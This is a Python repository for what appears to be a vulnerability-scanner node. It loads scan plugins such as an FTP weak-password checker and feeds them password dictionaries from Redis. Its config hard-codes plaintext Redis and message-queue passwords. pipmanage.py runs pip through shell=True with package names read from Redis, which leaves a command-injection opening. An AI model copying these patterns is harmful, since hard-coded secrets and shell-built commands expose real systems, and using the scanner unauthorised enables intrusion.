| :param timestr: {str}'2016-02-25 20:21:04.242' 47 | :return: {datetime}2016-02-25 20:21:04.242000 48 | """ 49 | local_datetime = datetime.strptime(timestr, "%Y-%m-%d %H:%M:%S.%f") 50 | return local_datetime 51 | 52 | 53 | def strtime_to_timestamp(local_timestr): 54 | """将本地时间 (字符串格式,含毫秒) 转为 13 位整数的毫秒时间戳 55 | :param local_timestr: {str}'2016-02-25 20:21:04.242' 56 | :return: 1456402864242 57 | """ 58 | local_datetime = strtime_to_datetime(local_timestr) 59 | timestamp = datetime_to_timestamp(local_datetime) 60 | return timestamp 61 | 62 | 63 | def current_datetime(): 64 | """返回本地当前时间, 包含datetime 格式, 字符串格式, 时间戳格式 65 | :return: (datetime 格式, 字符串格式, 时间戳格式) 66 | """ 67 | # 当前时间:datetime 格式 68 | local_datetime_now = datetime.now() 69 | # 当前时间:字符串格式 70 | local_strtime_now = datetime_to_strtime(local_datetime_now) 71 | # 当前时间:时间戳格式 13位整数 72 | local_timestamp_now = datetime_to_timestamp(local_datetime_now) 73 | return local_datetime_now, local_strtime_now, local_timestamp_now 74 | 75 | 76 | if __name__ == '__main__': 77 | pass -------------------------------------------------------------------------------- /Utils/mylog.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | import logging 3 | import logging.config 4 | import logging.handlers 5 | from config import myconfig 6 | from mlogging import TimedRotatingFileHandler_MP 7 | from os import path 8 | 9 | 10 | class Log: 11 | __file = 'vhostlog' # 日志文件名称 12 | __handler = False 13 | __fmt = '%(asctime)s - %(filename)s:[line:%(lineno)s] - %(name)s - %(message)s'# 输出格式 14 | _instance = None 15 | 16 | def __new__(cls, *args, **kw): 17 | if not cls._instance: 18 | cls._instance = super(Log, cls).__new__(cls, *args, **kw) 19 | return cls._instance 20 | 21 | def __init__(self): 22 | # read config 23 | logging.config.fileConfig(path.join(path.dirname(path.abspath(__file__)), '../logger.conf')) 24 | 25 | #logging.basicConfig(filename=self.__file, filemode='a+', format=self.__fmt) 26 | # self.__handler = logging.handlers.RotatingFileHandler(self.__file, maxBytes=1024*1024, backupCount=5) 27 | # 打印 28 | #self.__handler = logging.StreamHandler() 29 | #self.__handler.setLevel(logging.INFO) 30 | 31 | # 设置格式 32 | #formatter = logging.Formatter(self.__fmt) 33 | #self.__handler.setFormatter(formatter) 34 | return 35 | 36 | # 获取实例 37 | def getInstance(self): 38 | logger = logging.getLogger() 39 | #logger.addHandler(self.__handler) 40 | #logger.setLevel(logging.DEBUG) 41 | return logger 42 | 43 | -------------------------------------------------------------------------------- /Utils/readme.md: -------------------------------------------------------------------------------- 1 | utils 2 | -------------------------------------------------------------------------------- /VulRun.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | import redis, json, traceback, importlib, json 3 | from config import myconfig 4 | from Utils import mylog 5 | from Factories import * 6 | log = mylog.Log().getInstance() 7 | 8 | 9 | def get_config()->dict: 10 | """ 11 | 获取字典列表 12 | value: json data, type=text,json,separate, info=str, ep{type:"separate", separate:"|" info:"hahah"} 13 | """ 14 | # log.info(myconfig["default"].REDIS_URL) 15 | # log.info(myconfig["default"].REDIS_PORT) 16 | # log.info(myconfig["default"].REDIS_PASS) 17 | # log.info(myconfig["default"].REDIS_DB) 18 | conn = redis.Redis(host=myconfig["default"].REDIS_URL, port=myconfig['default'].REDIS_PORT, 19 | password=myconfig['default'].REDIS_PASS, db=myconfig['default'].REDIS_DB) 20 | # conn.set("x1", "hello", ex=5) # ex代表seconds,px代表ms 21 | keylist = conn.keys("SEC_*") 22 | internalDict = {} 23 | 24 | for key in keylist: 25 | r_value = conn.get(key) 26 | if r_value is None: 27 | continue 28 | json_value = json.loads(r_value) 29 | pars = DictFactory.get_parser(json_value) 30 | dict_value = pars.get_dict() 31 | internalDict[key] = dict_value 32 | 33 | return internalDict 34 | 35 | 36 | def check(module_name, ip) -> (bool, str): 37 | """ 扫描的通用入口 """ 38 | status = False # 执行脚本,是否出现了不可控的异常 39 | script_check_status = False # 脚本检查返回结果-True 存在异常, False - 不存在异常 40 | ret = "" 41 | try: 42 | _dic = get_config() 43 | scrip = importlib.import_module('scripts.' + module_name) 44 | for k, v in _dic.items(): 45 | # log.info('set attr ', str(k), v) 46 | # print("set attr ", str(k), v) 47 | setattr(scrip, bytes(k).decode(encoding='utf-8'), v) 48 | # setattr(scrip, "PASSWORD_DIC", PASSWORD_DIC) # 给插件声明密码字典 49 | # setattr(scrip, "log", log) 50 | log.info("准备执行啦.... " + module_name) 51 | script_check_status, ret = scrip.do(ip) 52 | log.info('执行完了......... ' + module_name) 53 | status = True 54 | except Exception as err: 55 | log.info("VulRun-check failed: {},\ndetail - {}".format(err, traceback.format_exc())) 56 | status = False 57 | ret = str(err.args) 58 | return status, script_check_status, ret 59 | 60 | 61 | if __name__ == "__main__": 62 | log.info("asdf") 63 | # check() 64 | # conn = redis.Redis(host=myconfig["default"].REDIS_URL, port=myconfig['default'].REDIS_PORT, 65 | # password=myconfig['default'].REDIS_PASS, db=0) 66 | _dic = get_config() 67 | log.info('获取字典完成,共计: {}'.format( len(_dic))) 68 | scrip = __import__('scripts.' + 'ftpweakscan', fromlist=('ftpweakscan',)) 69 | print('导入模块完成') 70 | for k, v in _dic.items(): 71 | # log.info('set attr ', str(k), v) 72 | print("set attr ", bytes(k).decode(encoding='utf-8'), v) 73 | setattr(scrip, bytes(k).decode(encoding='utf-8'), v) 74 | # setattr(scrip, "PASSWORD_DIC", PASSWORD_DIC) # 给插件声明密码字典 75 | setattr(scrip,"log", log) 76 | print("准备执行啦....") 77 | script_check_status, ret = scrip.do("ip") 78 | print('执行完了.........') -------------------------------------------------------------------------------- /config.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/python3.6 2 | # coding:utf-8 3 | import os, traceback, sys 4 | # from Utils import mylog 5 | # log = mylog.Log().getInstance() 6 | 7 | basedir = os.path.abspath(os.path.dirname(__file__)) 8 | 9 | 10 | class Config(object): 11 | def __init__(self): 12 | self.MQ_URL = '172.22.139.13' 13 | self.MQ_PORT = 5672 14 | self.MQ_SCAN_QUEUE = "prod_scan_queue" 15 | self.MQ_SCAN_QUEUE_PRIO = 3 16 | self.MQ_HEART_EXCHANGE = "prod_heart_exchange" 17 | self.MQ_HEART_EXCHANGE_TYPE = "fanout" 18 | self.MQ_RESULT_EXCHANGE = "prod_result_exchange" 19 | self.MQ_RESULT_EXCHNAGE_TYPE = "fanout" 20 | self.MQ_USER = "test" 21 | self.MQ_PASS = "88888888" 22 | # ======= REDIS ======= 23 | self.REDIS_URL = "127.0.0.1" 24 | self.REDIS_PORT = 6379 25 | self.REDIS_PASS = "davy811220" 26 | self.REDIS_DB = 0 27 | # 心跳频率 28 | self.HEART_RATE = 60 29 | 30 | 31 | # 从环境变量中读取并解析配置 32 | def get_env(self): 33 | mq_info_str = os.environ.get('MQ_ENV') # test:88888@1.2.3.4:5555 34 | print("MQ_ENV:", mq_info_str) 35 | mq_scan_str = os.environ.get('MQ_SCAN_ENV') # queuename:max priority scan_queue:3 36 | print("MQ_SCAN_ENV:", mq_scan_str) 37 | mq_heart_str = os.environ.get('MQ_HEART_ENV') # exchangename:exchangetype proc_heart_exchange:fanout 38 | print("MQ_HEART_ENV:", mq_heart_str) 39 | mq_result_str = os.environ.get('MQ_RESULT_ENV') # queuename:max priority proc_result_exchange:fanout 40 | print("MQ_RESULT_ENV:", mq_result_str) 41 | redis_info_str = os.environ.get('REDIS_ENV') # db_num:password@ip:port 42 | print("REDIS_ENV:", redis_info_str) 43 | heart_rate = os.environ.get('HEART_RATE') 44 | print("HEART_RATE:", heart_rate) 45 | try: 46 | if heart_rate is not None: 47 | self.HEART_RATE = int(heart_rate) 48 | if mq_info_str is not None: 49 | mq_info = str(mq_info_str).strip().split('@') 50 | if len(mq_info) != 2: 51 | raise Exception('analysis mq_env length not equal 2, failed.') 52 | # 整理 MQ相关的 53 | mq_info_account = mq_info[0].split(':') 54 | self.MQ_USER = mq_info_account[0].strip() 55 | self.MQ_PASS = mq_info_account[1].strip() 56 | mq_info_url = mq_info[1].split(':') 57 | self.MQ_URL = mq_info_url[0].strip() 58 | self.MQ_PORT = int(mq_info_url[1].strip()) 59 | if mq_scan_str is not None: 60 | mq_tmp = mq_scan_str.split(":") 61 | self.MQ_SCAN_QUEUE = mq_tmp[0].strip() 62 | self.MQ_SCAN_QUEUE_PRIO = int(mq_tmp[1].strip()) 63 | if mq_heart_str is not None: 64 | mq_tmp = mq_heart_str.split(':') 65 | self.MQ_HEART_EXCHANGE = mq_tmp[0] 66 | self.MQ_HEART_EXCHANGE_TYPE = mq_tmp[1] 67 | if mq_result_str is not None: 68 | mq_tmp = mq_result_str.split(':') 69 | self.MQ_RESULT_EXCHANGE = mq_tmp[0] 70 | self.MQ_RESULT_EXCHNAGE_TYPE = mq_tmp[1] 71 | 72 | # 整理redis相关的 db_num:password@ip:port 73 | if redis_info_str is not None: 74 | redis_info = str(redis_info_str).strip().split('@') 75 | if len(redis_info) != 2: 76 | raise Exception('analysis redis_env length not equal 2, failed.') 77 | redis_tmp = redis_info[0].split(':') 78 | if len(redis_tmp) != 2: 79 | self.REDIS_DB = 0 80 | self.REDIS_PASS = '' 81 | else: 82 | self.REDIS_DB = int(redis_tmp[0].strip()) 83 | self.REDIS_PASS = redis_tmp[1].strip() 84 | redis_tmp = redis_info[1].split(':') 85 | self.REDIS_URL = redis_tmp[0].strip() 86 | self.REDIS_PORT = int(redis_tmp[1].strip()) 87 | except Exception as err: 88 | print('analysis env args failed. ', err) 89 | sys.exit(-1) 90 | 91 | 92 | class DevelopmentConfig(Config): 93 | def __init__(self): 94 | super().__init__() 95 | self.get_env() 96 | # 自定义一些测试环境变量值 97 | self.MQ_URL = '172.22.139.13' 98 | self.MQ_SCAN_QUEUE = "dev_scan_queue" 99 | pass 100 | 101 | 102 | class TestingConfig(Config): 103 | def __init__(self): 104 | super().__init__() 105 | self.get_env() 106 | pass 107 | 108 | 109 | class ProductionConfig(Config): 110 | def __init__(self): 111 | super().__init__() 112 | self.get_env() 113 | pass 114 | 115 | 116 | myconfig = { 117 | # 'development': DevelopmentConfig(), 118 | # 'testing': TestingConfig(), 119 | # 'production': ProductionConfig(), 120 | 'default': ProductionConfig() 121 | } 122 | 123 | 124 | if __name__ == "__main__": 125 | print(myconfig['default'].MQ_URL, myconfig['default'].MQ_SCAN_QUEUE) 126 | 127 | 128 | -------------------------------------------------------------------------------- /helpers/__init__.py: -------------------------------------------------------------------------------- 1 | from helpers import redishelper 2 | from helpers import filehelper -------------------------------------------------------------------------------- /helpers/filehelper.py: -------------------------------------------------------------------------------- 1 | import os 2 | 3 | 4 | def readfirstline(filename) -> str: 5 | ver = "" 6 | try: 7 | if not os.path.exists(filename): 8 | os.mknod(filename) 9 | with open(filename, 'r') as f: 10 | ver = f.readline() 11 | f.close() 12 | return ver 13 | except: 14 | return "" 15 | 16 | 17 | def write(filename, content=""): 18 | try: 19 | with open(filename, 'w') as f: 20 | f.write(content) 21 | f.close() 22 | except Exception as err: 23 | print("write file failed.", err) 24 | 25 | -------------------------------------------------------------------------------- /helpers/readme.md: -------------------------------------------------------------------------------- 1 | some helpers 2 | -------------------------------------------------------------------------------- /helpers/redishelper.py: -------------------------------------------------------------------------------- 1 | import redis, json, traceback, time, socket 2 | from config import myconfig 3 | import Utils.mylog 4 | log = Utils.mylog.Log().getInstance() 5 | 6 | 7 | def __get_connection(): 8 | conn = redis.Redis(host=myconfig["default"].REDIS_URL, port=myconfig['default'].REDIS_PORT, 9 | password=myconfig['default'].REDIS_PASS, db=myconfig['default'].REDIS_DB) 10 | return conn 11 | 12 | 13 | def get_pipupdate(): 14 | try: 15 | conn = __get_connection() 16 | tmp_val = conn.get("package_update") 17 | return tmp_val 18 | except Exception as err: 19 | log.error("get_pipupdate failed. {}, \ndetail:{}".format(err, traceback.format_exc())) 20 | return None 21 | 22 | 23 | 24 | def needstop(taskid)->bool: 25 | try: 26 | conn = __get_connection() 27 | hostname = socket.gethostname() 28 | tmp_val = conn.get(hostname + "_action") 29 | conn.delete(hostname + "_action") 30 | # todo id action,以后再加操作吧 31 | if tmp_val is not None: 32 | json_obj = json.loads(tmp_val, encoding=True) 33 | if "id" in json_obj: 34 | return taskid == json_obj['id'] 35 | return False 36 | except Exception as err: 37 | log.error("check task cancle failed. {}, \ndetail - {}".format(err,traceback)) 38 | return False 39 | 40 | def getonetask(): 41 | while True: 42 | con = None 43 | try: 44 | con = __get_connection() 45 | scan_list = con.keys("task_*") 46 | for tmp_key in scan_list: 47 | tmp_val = con.get(tmp_key) 48 | if tmp_key is None: 49 | continue 50 | if con.delete(tmp_key) == 0: 51 | continue 52 | log.info("get task: {}".format(tmp_val)) 53 | json_obj = json.loads(tmp_val, encoding='utf-8') 54 | return json_obj 55 | log.info("no task, sleep....") 56 | time.sleep(10) 57 | # json_str = con.blpop("tasklist") 58 | # log.info("get task: {}".format(json_str)) 59 | # json_obj = json.loads(json_str, encoding='utf-8') 60 | # return json_obj 61 | except Exception as err: 62 | log.error("get one task failed.{},\ndetail - {}".format(err, traceback.format_exc())) 63 | time.sleep(60) 64 | finally: 65 | if con is not None: 66 | # log.info("close redis connection.") 67 | con.close() 68 | 69 | 70 | def send_heart(heart_str, rkeyname) -> bool: 71 | """ 发送心跳到redis """ 72 | try: 73 | conn = __get_connection() 74 | #conn.lpush(rkeyname, heart_str) 75 | extime = 3600 * 24 * 5 76 | conn.set(name="heart_" + socket.gethostname(), value=heart_str, ex=extime) 77 | conn.close() 78 | except Exception as err: 79 | log.error("send_heart failed. {}, \ndetail - {}".format(err, traceback)) 80 | return False 81 | 82 | 83 | def send_result(result_str, result_key) -> bool: 84 | """ 发送结果到结果list """ 85 | try: 86 | conn = __get_connection() 87 | conn.rpush(result_key, result_str) 88 | log.info("send redis result:{},{}".format(result_key, result_str)) 89 | conn.close() 90 | except Exception as err: 91 | log.error("send_result failed. {}, \ndetail - {}".format(err, traceback)) 92 | return False 93 | 94 | 95 | if __name__ == '__main__': 96 | c = __get_connection() 97 | print(c.get("packages")) 98 | -------------------------------------------------------------------------------- /logger.conf: -------------------------------------------------------------------------------- 1 | [loggers] 2 | keys=root,consoleHandler,errorlogger 3 | 4 | [logger_root] 5 | level=DEBUG 6 | handlers=consoleHandler,errorhandler 7 | 8 | [logger_consoleHandler] 9 | handlers=consoleHandler 10 | qualname=consoleLogger 11 | propagate=0 12 | 13 | [logger_errorlogger] 14 | handlers=errorhandler 15 | qualname=errorlogger 16 | propagate=0 17 | 18 | ############################################### 19 | 20 | [handlers] 21 | keys=consoleHandler,errorhandler 22 | 23 | [handler_consoleHandler] 24 | class=StreamHandler 25 | level=INFO 26 | formatter=form01 27 | args=(sys.stdout,) 28 | 29 | [handler_errorhandler] 30 | class=mlogging.TimedRotatingFileHandler_MP 31 | level=INFO 32 | formatter=form01 33 | args=('logs/xnsec.log', 'D', 1, 0) 34 | 35 | ############################################### 36 | 37 | [formatters] 38 | keys=form01 39 | 40 | [formatter_form01] 41 | format=%(asctime)s %(filename)s(%(lineno)d) [%(process)d] %(levelname)s %(module)s %(funcName)s %(message)s 42 | 43 | 44 | 45 | -------------------------------------------------------------------------------- /logs/readme.md: -------------------------------------------------------------------------------- 1 | 没有自动创建这个logs的文件夹,所以直接git上传上来吧。 2 | -------------------------------------------------------------------------------- /main.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | import multiprocessing 3 | import ScanHandler 4 | import HeartBeatHandler 5 | import recovermq 6 | import time 7 | from Utils import mylog 8 | log = mylog.Log().getInstance() 9 | 10 | 11 | if __name__ == "__main__": 12 | # 心跳 13 | multiprocessing.Process(target=HeartBeatHandler.HeartMonitor, args=()).start() 14 | # 失败消息重试 15 | multiprocessing.Process(target=recovermq.recover, args=()).start() 16 | # 扫描 17 | ScanHandler.scanmonitor() 18 | # p = multiprocessing.Process(target=test) 19 | # p.start() 20 | # time.sleep(10) 21 | # p.terminate() 22 | # p.join() 23 | # print('end....12113') 24 | -------------------------------------------------------------------------------- /mlogging/__init__.py: -------------------------------------------------------------------------------- 1 | # Copyright 2001-2007 by Vinay Sajip. All Rights Reserved. 2 | # 3 | # Permission to use, copy, modify, and distribute this software and its 4 | # documentation for any purpose and without fee is hereby granted, 5 | # provided that the above copyright notice appear in all copies and that 6 | # both that copyright notice and this permission notice appear in 7 | # supporting documentation, and that the name of Vinay Sajip 8 | # not be used in advertising or publicity pertaining to distribution 9 | # of the software without specific, written prior permission. 10 | # VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING 11 | # ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL 12 | # VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR 13 | # ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER 14 | # IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT 15 | # OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. 16 | 17 | """ 18 | Additional handler : RotatingFileHandler and TimedRotatingFileHandler 19 | for MultiProcess 20 | """ 21 | 22 | from logging import StreamHandler, FileHandler 23 | from logging.handlers import RotatingFileHandler, TimedRotatingFileHandler 24 | import fcntl, time, os, codecs, string, re, types, pickle, struct, shutil 25 | from stat import ST_DEV, ST_INO, ST_MTIME 26 | 27 | 28 | class StreamHandler_MP(StreamHandler): 29 | """ 30 | A handler class which writes logging records, appropriately formatted, 31 | to a stream. Use for multiprocess. 32 | """ 33 | 34 | def emit(self, record): 35 | """ 36 | Emit a record. 37 | First seek the end of file for multiprocess to log to the same file 38 | """ 39 | try: 40 | if hasattr(self.stream, "seek"): 41 | self.stream.seek(0, os.SEEK_END) 42 | except IOError as e: 43 | pass 44 | 45 | StreamHandler.emit(self, record) 46 | 47 | 48 | class FileHandler_MP(FileHandler, StreamHandler_MP): 49 | """ 50 | A handler class which writes formatted logging records to disk files 51 | for multiprocess 52 | """ 53 | 54 | def emit(self, record): 55 | """ 56 | Emit a record. 57 | If the stream was not opened because 'delay' was specified in the 58 | constructor, open it before calling the superclass's emit. 59 | """ 60 | if self.stream is None: 61 | self.stream = self._open() 62 | StreamHandler_MP.emit(self, record) 63 | 64 | 65 | class RotatingFileHandler_MP(RotatingFileHandler, FileHandler_MP): 66 | """ 67 | Handler for logging to a set of files, which switches from one file 68 | to the next when the current file reaches a certain size. 69 | 70 | Based on logging.RotatingFileHandler, modified for Multiprocess 71 | """ 72 | _lock_dir = '.lock' 73 | if os.path.exists(_lock_dir): 74 | pass 75 | else: 76 | os.mkdir(_lock_dir) 77 | 78 | def doRollover(self): 79 | """ 80 | Do a rollover, as described in __init__(). 81 | For multiprocess, we use shutil.copy instead of rename. 82 | """ 83 | 84 | self.stream.close() 85 | if self.backupCount > 0: 86 | for i in range(self.backupCount - 1, 0, -1): 87 | sfn = "%s.%d" % (self.baseFilename, i) 88 | dfn = "%s.%d" % (self.baseFilename, i + 1) 89 | if os.path.exists(sfn): 90 | if os.path.exists(dfn): 91 | os.remove(dfn) 92 | shutil.copy(sfn, dfn) 93 | dfn = self.baseFilename + ".1" 94 | if os.path.exists(dfn): 95 | os.remove(dfn) 96 | if os.path.exists(self.baseFilename): 97 | shutil.copy(self.baseFilename, dfn) 98 | self.mode = 'w' 99 | self.stream = self._open() 100 | 101 | def emit(self, record): 102 | """ 103 | Emit a record. 104 | Output the record to the file, catering for rollover as described 105 | in doRollover(). 106 | 107 | For multiprocess, we use file lock. Any better method ? 108 | """ 109 | try: 110 | if self.shouldRollover(record): 111 | self.doRollover() 112 | FileLock = self._lock_dir + '/' + os.path.basename(self.baseFilename) + '.' + record.levelname 113 | f = open(FileLock, "w+") 114 | fcntl.flock(f.fileno(), fcntl.LOCK_EX) 115 | FileHandler_MP.emit(self, record) 116 | fcntl.flock(f.fileno(), fcntl.LOCK_UN) 117 | f.close() 118 | except (KeyboardInterrupt, SystemExit): 119 | raise 120 | except: 121 | self.handleError(record) 122 | 123 | 124 | class TimedRotatingFileHandler_MP(TimedRotatingFileHandler, FileHandler_MP): 125 | """ 126 | Handler for logging to a file, rotating the log file at certain timed 127 | intervals. 128 | If backupCount is > 0, when rollover is done, no more than backupCount 129 | files are kept - the oldest ones are deleted. 130 | """ 131 | _lock_dir = '.lock' 132 | if os.path.exists(_lock_dir): 133 | pass 134 | else: 135 | os.mkdir(_lock_dir) 136 | 137 | def __init__(self, filename, when='h', interval=1, backupCount=0, encoding=None, delay=0, utc=0): 138 | FileHandler_MP.__init__(self, filename, 'a', encoding, delay) 139 | self.encoding = encoding 140 | self.when = str.upper(when) 141 | self.backupCount = backupCount 142 | self.utc = utc 143 | # Calculate the real rollover interval, which is just the number of 144 | # seconds between rollovers. Also set the filename suffix used when 145 | # a rollover occurs. Current 'when' events supported: 146 | # S - Seconds 147 | # M - Minutes 148 | # H - Hours 149 | # D - Days 150 | # midnight - roll over at midnight 151 | # W{0-6} - roll over on a certain day; 0 - Monday 152 | # 153 | # Case of the 'when' specifier is not important; lower or upper case 154 | # will work. 155 | if self.when == 'S': 156 | self.suffix = "%Y-%m-%d_%H-%M-%S" 157 | self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}-\d{2}-\d{2}$" 158 | elif self.when == 'M': 159 | self.suffix = "%Y-%m-%d_%H-%M" 160 | self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}-\d{2}$" 161 | elif self.when == 'H': 162 | self.suffix = "%Y-%m-%d_%H" 163 | self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}$" 164 | elif self.when == 'D' or self.when == 'MIDNIGHT': 165 | self.suffix = "%Y-%m-%d" 166 | self.extMatch = r"^\d{4}-\d{2}-\d{2}$" 167 | elif self.when.startswith('W'): 168 | if len(self.when) != 2: 169 | raise ValueError("You must specify a day for weekly rollover from 0 to 6 (0 is Monday): %s" % self.when) 170 | if self.when[1] < '0' or self.when[1] > '6': 171 | raise ValueError("Invalid day specified for weekly rollover: %s" % self.when) 172 | self.dayOfWeek = int(self.when[1]) 173 | self.suffix = "%Y-%m-%d" 174 | self.extMatch = r"^\d{4}-\d{2}-\d{2}$" 175 | else: 176 | raise ValueError("Invalid rollover interval specified: %s" % self.when) 177 | 178 | self.extMatch = re.compile(self.extMatch) 179 | 180 | if interval != 1: 181 | raise ValueError("Invalid rollover interval, must be 1") 182 | 183 | def shouldRollover(self, record): 184 | """ 185 | Determine if rollover should occur. 186 | record is not used, as we are just comparing times, but it is needed so 187 | the method signatures are the same 188 | """ 189 | if not os.path.exists(self.baseFilename): 190 | # print "file don't exist" 191 | return 0 192 | 193 | cTime = time.localtime(time.time()) 194 | mTime = time.localtime(os.stat(self.baseFilename)[ST_MTIME]) 195 | if self.when == "S" and cTime[5] != mTime[5]: 196 | # print "cTime:", cTime[5], "mTime:", mTime[5] 197 | return 1 198 | elif self.when == 'M' and cTime[4] != mTime[4]: 199 | # print "cTime:", cTime[4], "mTime:", mTime[4] 200 | return 1 201 | elif self.when == 'H' and cTime[3] != mTime[3]: 202 | # print "cTime:", cTime[3], "mTime:", mTime[3] 203 | return 1 204 | elif (self.when == 'MIDNIGHT' or self.when == 'D') and cTime[2] != mTime[2]: 205 | # print "cTime:", cTime[2], "mTime:", mTime[2] 206 | return 1 207 | elif self.when == 'W' and cTime[1] != mTime[1]: 208 | # print "cTime:", cTime[1], "mTime:", mTime[1] 209 | return 1 210 | else: 211 | return 0 212 | 213 | def doRollover(self): 214 | """ 215 | do a rollover; in this case, a date/time stamp is appended to the filename 216 | when the rollover happens. However, you want the file to be named for the 217 | start of the interval, not the current time. If there is a backup count, 218 | then we have to get a list of matching filenames, sort them and remove 219 | the one with the oldest suffix. 220 | 221 | For multiprocess, we use shutil.copy instead of rename. 222 | """ 223 | if self.stream: 224 | self.stream.close() 225 | # get the time that this sequence started at and make it a TimeTuple 226 | # t = self.rolloverAt - self.interval 227 | t = int(time.time()) 228 | if self.utc: 229 | timeTuple = time.gmtime(t) 230 | else: 231 | timeTuple = time.localtime(t) 232 | dfn = self.baseFilename + "." + time.strftime(self.suffix, timeTuple) 233 | if os.path.exists(dfn): 234 | os.remove(dfn) 235 | if os.path.exists(self.baseFilename): 236 | shutil.copy(self.baseFilename, dfn) 237 | # print "%s -> %s" % (self.baseFilename, dfn) 238 | # os.rename(self.baseFilename, dfn) 239 | if self.backupCount > 0: 240 | # find the oldest log file and delete it 241 | # s = glob.glob(self.baseFilename + ".20*") 242 | # if len(s) > self.backupCount: 243 | # s.sort() 244 | # os.remove(s[0]) 245 | for s in self.getFilesToDelete(): 246 | os.remove(s) 247 | self.mode = 'w' 248 | self.stream = self._open() 249 | 250 | def emit(self, record): 251 | """ 252 | Emit a record. 253 | Output the record to the file, catering for rollover as described 254 | in doRollover(). 255 | 256 | For multiprocess, we use file lock. Any better method ? 257 | """ 258 | try: 259 | if self.shouldRollover(record): 260 | self.doRollover() 261 | FileLock = self._lock_dir + '/' + os.path.basename(self.baseFilename) + '.' + record.levelname 262 | f = open(FileLock, "w+") 263 | fcntl.flock(f.fileno(), fcntl.LOCK_EX) 264 | FileHandler_MP.emit(self, record) 265 | fcntl.flock(f.fileno(), fcntl.LOCK_UN) 266 | f.close() 267 | except (KeyboardInterrupt, SystemExit): 268 | raise 269 | except: 270 | self.handleError(record) 271 | -------------------------------------------------------------------------------- /mlogging/readme.md: -------------------------------------------------------------------------------- 1 | 日志模块 2 | -------------------------------------------------------------------------------- /node_run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | git pull https://e.coding.net/davytitan/xn-scannode.git 3 | pip install -r ./requirements.txt -i https://pypi.doubanio.com/simple/ 4 | touch package.ver 5 | # echo "1.0.0" >> package.ver 6 | # nohup crond >/dev/null 2>&1 & 7 | python -u scan.py 8 | -------------------------------------------------------------------------------- /pipmanage.py: -------------------------------------------------------------------------------- 1 | from helpers import redishelper, filehelper 2 | from Utils import mylog 3 | import time, traceback, json, subprocess, importlib 4 | log = mylog.Log().getInstance() 5 | 6 | 7 | def __module_exist(module_name) -> bool: 8 | try: 9 | importlib.import_module(module_name) 10 | return True 11 | except: 12 | return False 13 | 14 | 15 | def host_pip_install(): 16 | while True: 17 | try: 18 | json_str = redishelper.get_pipupdate() 19 | if json_str is None: 20 | continue 21 | json_obj = json.loads(json_str, encoding='utf-8') 22 | # {"version":"1.0.0", "packages":[["install_name":"spyne","module_name":"spyne"],""], "mirror":"国内源"} 23 | local_ver = filehelper.readfirstline("package.ver").strip() 24 | all_suc = True 25 | if local_ver != json_obj['version']: 26 | log.info("pip有版本变化...") 27 | for p in json_obj["packages"]: 28 | if p is None or len(p) == 0: 29 | continue 30 | if __module_exist(p['module_name']): # 判断模块是否安装,也省得日志满天飞 31 | continue 32 | cmds = ["pip" + " install " + p['install_name'] + " -i " + json_obj['mirror']] 33 | ret = subprocess.run(cmds, shell=True, 34 | stdout=subprocess.PIPE, 35 | stderr=subprocess.PIPE, 36 | encoding="utf-8") 37 | log.info("pip_install: {}, return {},\nstderr:{},\nstdout:{}".format(cmds, 38 | ret.returncode, ret.stderr, ret.stdout)) 39 | 40 | if ret.returncode != 0: 41 | all_suc = False 42 | if all_suc: 43 | filehelper.write("package.ver", json_obj['version']) 44 | except Exception as err: 45 | log.error("host_pip_install failed. {},\ndetail:{}".format(err,traceback.format_exc())) 46 | finally: 47 | time.sleep(60) 48 | 49 | 50 | if __name__ == '__main__': 51 | json_str = '{"version":"1.0.0", "packages":[{"install_name":"spyne","module_name":"spyne1"},{}], "mirror":"国内源"}' 52 | import json 53 | obj =json.loads(json_str, encoding='utf-8') 54 | print(obj["packages"][0]["module_name"]) 55 | 56 | 57 | -------------------------------------------------------------------------------- /recovermq.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | import time, traceback 3 | import multiprocessing 4 | from Models import ExceptionResult 5 | from Utils import mylog 6 | import ScanResult 7 | 8 | log = mylog.Log().getInstance() 9 | 10 | 11 | def recover(): 12 | while True: 13 | if len(ExceptionResult.failed_list) > 0: 14 | log.info("recover send msg: ", ExceptionResult.failed_list) 15 | try: 16 | msg = ExceptionResult.failed_list.pop() 17 | # 重用一下这个方法,以后有问题就再重写吧 18 | ScanResult.sendtoredis(msg) 19 | pass 20 | except Exception as err: 21 | log.error("recover error: ", traceback.format_exc()) 22 | time.sleep(10 * 60) 23 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | alabaster==0.7.12 2 | Babel==2.8.0 3 | bcrypt==3.1.7 4 | beautifulsoup4==4.8.2 5 | certifi==2019.11.28 6 | cffi==1.14.0 7 | chardet==3.0.4 8 | cryptography==2.8 9 | cx-Oracle==7.3.0 10 | docker==4.2.0 11 | docutils==0.16 12 | fdfs-client==4.0.7 13 | future==0.18.2 14 | hashids==1.2.0 15 | html5lib==1.0.1 16 | idna==2.9 17 | imagesize==1.2.0 18 | importlib-metadata==1.6.0 19 | importlib-resources==1.4.0 20 | Jinja2==2.11.1 21 | MarkupSafe==1.1.1 22 | packaging==20.3 23 | paramiko==2.7.1 24 | passlib==1.7.2 25 | pika==1.1.0 26 | pycparser==2.20 27 | pycrypto==2.6.1 28 | Pygments==2.6.1 29 | pymongo==3.10.1 30 | PyMySQL==0.9.3 31 | PyNaCl==1.3.0 32 | pyOpenSSL==19.1.0 33 | pyparsing==2.4.6 34 | pysmb==1.1.28 35 | python3-nmap==1.4.1 36 | pytz==2019.3 37 | redis==3.4.1 38 | requests==2.23.0 39 | requestsexceptions==1.4.0 40 | simplejson==3.17.0 41 | 